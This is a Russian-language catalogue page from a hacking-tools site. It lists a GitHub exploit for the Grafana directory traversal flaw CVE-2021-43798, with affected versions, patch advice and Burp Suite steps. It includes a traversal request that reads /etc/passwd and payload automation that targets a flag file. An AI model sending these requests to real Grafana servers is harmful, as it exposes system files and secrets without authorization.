Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-43798 — Эксплойт для обхода каталогов Grafana (CVE-2021-43798) с интеграцией Burp Suite и автоматизацией полезной нагрузки для доступа к локальным файлам на уязвимых экземплярах. | Kitploit
Инструменты/GitHubGitHub/iris288/cve-2021-43798
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubiris288/cve-2021-43798

CVE-2021-43798

Эксплойт для обхода каталогов Grafana (CVE-2021-43798) с интеграцией Burp Suite и автоматизацией полезной нагрузки для доступа к локальным файлам на уязвимых экземплярах.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-43798

Версии Grafana с 8.0.0-beta1 по 8.3.0 (кроме исправленных версий) уязвимы для обхода каталогов, что позволяет получить доступ к локальным файлам.

Grafana — это платформа с открытым исходным кодом для мониторинга и наблюдаемости. Версии Grafana с 8.0.0-beta1 по 8.3.0 (кроме исправленных версий) уязвимы для обхода каталогов, что позволяет получить доступ к локальным файлам. Уязвимый путь URL: <grafana_host_url>/public/plugins//, где — это идентификатор плагина для любого установленного плагина. Grafana Cloud никогда не была уязвима. Пользователям рекомендуется обновиться до исправленных версий 8.0.7, 8.1.8, 8.2.7 или 8.3.1. В рекомендациях GitHub Security Advisory содержится дополнительная информация об уязвимых путях URL, мерах по смягчению последствий и сроках раскрытия информации.

Использование Burp Suite

Отправьте GET в Repeater

GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

Затем отправьте в Intruder GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

Использование Sniper для атаки Полезная нагрузка скопирована из github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

Обработка полезной нагрузки Совпадение [{FILE}] заменить на {flag.txt}

Скачать инструмент